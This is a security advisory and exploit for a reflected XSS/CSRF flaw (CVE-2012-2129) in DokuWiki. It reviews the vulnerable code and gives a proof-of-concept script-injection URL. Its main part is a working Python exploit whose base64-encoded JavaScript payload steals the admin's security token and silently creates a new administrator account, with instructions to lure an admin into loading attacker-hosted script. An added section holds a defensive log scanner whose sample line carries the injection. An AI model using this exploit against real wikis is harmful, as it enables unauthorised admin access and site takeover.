DokuWiki Ver.2012/01/25 CSRF Add User Exploit

Published: 2012-04-17 CVE: 2012-2129 OSVDB-ID: N/A
######################################################################################
DokuWiki Ver.2012/01/25 ( Latest Version ) CSRF Add User Exploit
######################################################################################
Discovered by : Khashayar Fereidani
Team Website : HTTP://IRCRASH.COM ( IRCRASH Security Community )
Facebook : http://facebook.com/fereidani
Twitter : https://twitter.com/#!/IRCRASH
Facebook Page : http://www.facebook.com/pages/IRCRASH/127804297326163
Software Developer : http://www.dokuwiki.org/
######################################################################################
Test System Details
OS : Linux
WebServer : Nginx + PHP-5.3.5
WebBrowser : Firefox 10
######################################################################################
Subjects :
1. Vulnerability Explanation
2. Code Review
3. Cross Site Scripting vulnerability Proof of concept
4. Add User Exploit
######################################################################################
1. Vulnerability Explanation :

The target variable in /inc/html.php is not checked for illegal input, and the
function html_edit_form prints $param['target'] from the $param array without any filtering.
This variable (target) is therefore exploitable for a Cross Site Scripting vulnerability.

######################################################################################
2. Code Review :

# Filename : /inc/html.php
** Line 1336 ( Vulnerable Variable $_REQUEST['target'] ) :
$data =     array('form' => $form,
                  'wr'   => $wr,
                  'media_manager' => true,
                  'target' => (isset($_REQUEST['target']) && $wr &&
                               $RANGE !== '') ? $_REQUEST['target'] : 'section',
                  'intro_locale' => $include);

** Line 1436 (Vulnerable Function) :
function html_edit_form($param) {
    global $TEXT;

    if ($param['target'] !== 'section') {
        msg('No editor for edit target ' . $param['target'] . ' found.', -1);
    }

    $attr = array('tabindex'=>'1');
    if (!$param['wr']) $attr['readonly'] = 'readonly';

    $param['form']->addElement(form_makeWikiText($TEXT, $attr));
}
######################################################################################
3. Cross Site Scripting vulnerability Proof of concept :
Vulnerable URL : http://WEBSITE/doku.php?do=edit&id=S9F8W2A&target=[XSS]
Sample : http://sitename/doku.php?do=edit&id=S9F8W2A&target=<script>alert(123)</script>
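As an added, defender-side example that is not part of the original advisory: a Python 3 scanner that walks web-server access-log lines (combined log format, constructed sample lines embedded below) and flags doku.php?do=edit requests whose target parameter is anything other than the single value html_edit_form expects ('section') and carries HTML metacharacters, which is exactly the condition that reaches msg() unescaped in the code reviewed above. The client addresses, host name and log layout are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined/common log format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (assumed hosts/IPs): one benign edit, one carrying
# the script-injection pattern from the advisory, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Apr/2012:10:00:00 +0000] '
    '"GET /doku.php?do=edit&id=start&target=section HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/Apr/2012:10:01:00 +0000] '
    '"GET /doku.php?do=edit&id=S9F8W2A&target=%3Cscript%20SRC%3Dhttp%3A%2F%2Fexample.invalid%2Fmy.js%3E%3C%2Fscript%3E HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [17/Apr/2012:10:02:00 +0000] '
    '"GET /doku.php?id=start HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
]

def is_suspicious_target(value):
    """The editor only ever expects target=section; any other value that carries
    HTML metacharacters would have been echoed verbatim by msg()."""
    if value == 'section':
        return False
    return any(ch in value for ch in '<>"\'')

def scan_access_log(lines):
    """Return one finding per edit request whose decoded target looks injected."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        parts = urlsplit(m.group('url'))
        if not parts.path.endswith('/doku.php'):
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
        if qs.get('do') != ['edit']:
            continue
        for target in qs.get('target', []):
            if is_suspicious_target(target):
                findings.append({'ip': m.group('ip'), 'ts': m.group('ts'),
                                 'status': m.group('status'), 'target': target})
    return findings

if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} target={f['target']!r}")
```

A non-'section' target without metacharacters (for example a plugin-supplied editor name) is deliberately not flagged, so the check stays quiet on ordinary traffic.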
######################################################################################
4. Add User Exploit :
#EXPLOITSTART
#!/usr/bin/python
import base64,string,random
def randstr(size=8, chars=string.ascii_uppercase + string.digits):
    return ''.join(random.choice(chars) for x in range(size))
print """
#####################################
# IRCRASH Dokuwiki Add User Exploit #
# Exploited By Khashayar Fereidani  #
# Http://ircrash.com                #
#####################################
"""
shellcode="""
ZnVuY3Rpb24gTXlSZXF1ZXN0KCkgew0KaWYgKHdpbmRvdy5YTUxIdHRwUmVxdWVzdCkgew0KUmVxUmVh
ZGVyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7DQp9IGVsc2Ugew0KUmVxUmVhZGVyID0gbmV3IEFjdGl2
ZXhPYmplY3QoIk1pY3Jvc29mdC5YTUxIVFRQIik7DQp9DQpSZXFSZWFkZXIub25yZWFkeXN0YXRlY2hh
bmdlID0gZnVuY3Rpb24gKCkgeyBUb2tlbkZpbmRlcihSZXFSZWFkZXIpOyB9DQpSZXFSZWFkZXIub3Bl
bigiR0VUIiwgImRva3UucGhwIiwgdHJ1ZSk7DQpSZXFSZWFkZXIuc2VuZCgpOw0KfQ0KZnVuY3Rpb24g
VG9rZW5GaW5kZXIoYSkgew0KaWYgKGEucmVhZHlTdGF0ZSA9PSA0ICYmIGEuc3RhdHVzID09IDIwMCkg
ew0KdmFyIHNyYyA9IGEucmVzcG9uc2VUZXh0Ow0KcCA9IC92YWx1ZT0iKFswLTlhLWZdKykiLzsNCnZh
ciB0b2tlbiA9IHNyYy5tYXRjaChwKTsNCnBhcmFtcyA9ICJzZWN0b2s9IiArIHRva2VuWzFdICsgIiZ1
c2VyaWQ9VVNFUk5BTUUmdXNlcnBhc3M9UEFTU1dPUkQmdXNlcm5hbWU9VVNFUk5BTUUmdXNlcm1haWw9
YXR0QHd3d3d3d3d3Lm9zZmEmdXNlcmdyb3Vwcz1hZG1pbix1c2VyJmRvPWFkbWluJnBhZ2U9dXNlcm1h
bmFnZXImc3RhcnQ9MCZmblthZGRdPUFkZCI7DQphbGVydChwYXJhbXMpOw0KRXhwbG9pdChwYXJhbXMp
Ow0KfQ0KfQ0KZnVuY3Rpb24gRXhwbG9pdChwYXJhbWV0ZXJzKSB7DQppZiAod2luZG93LlhNTEh0dHBS
ZXF1ZXN0KSB7DQpIdHRwUmVxID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7DQp9IGVsc2Ugew0KSHR0cFJl
cSA9IG5ldyBBY3RpdmV4T2JqZWN0KCJNaWNyb3NvZnQuWE1MSFRUUCIpOw0KfQ0KSHR0cFJlcS5vbnJl
YWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbiAoKSB7DQppZiAoSHR0cFJlcS5yZWFkeVN0YXRlID09IDQg
JiYgSHR0cFJlcS5zdGF0dXMgPT0gMjAwKSB7DQoNCn0NCn0NCkh0dHBSZXEub3BlbignUE9TVCcsICJk
b2t1LnBocD9pZD1kb2Fka3dva2FkIiwgdHJ1ZSk7DQpIdHRwUmVxLnNldFJlcXVlc3RIZWFkZXIoIkNv
bnRlbnQtdHlwZSIsICJhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiKTsNCkh0dHBSZXEu
c2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1sZW5ndGgiLCBwYXJhbWV0ZXJzLmxlbmd0aCk7DQpIdHRw
UmVxLnNldFJlcXVlc3RIZWFkZXIoIkNvbm5lY3Rpb24iLCAiY2xvc2UiKTsNCkh0dHBSZXEuc2VuZChw
YXJhbWV0ZXJzKTsNCn0NCk15UmVxdWVzdCgpOw0K"""
shellcode=base64.b64decode(shellcode)
username=raw_input("[*] Enter New Username :")
password=raw_input("[*] Enter Password :")
shellcode=shellcode.replace("USERNAME",username).replace("PASSWORD",password)
localFile = open('my.js', 'w')
localFile.write(shellcode)
localFile.close()
print """[*] A new file (my.js) added to your local folder .
  Upload it on your own host and send it for doku admin like this :
  http://WEBSITE/PATH/doku.php?do=edit&id=""" + randstr() + "&target=<script SRC=http://YOUROWNHOST/YOURFOLDER/my.js></script>"
#EXPLOITEND
######################################################################################
          Tnx : Just God
######################################################################################

Other References

SECUNIA Advisory : http://secunia.com/advisories/48848/
SECURITYFOCUS Advisory : http://www.securityfocus.com/bid/53041
SECLISTS Advisory : http://seclists.org/bugtraq/2012/Apr/121
IRCRASH Advisory : http://ircrash.com/uploads/dokuwiki.txt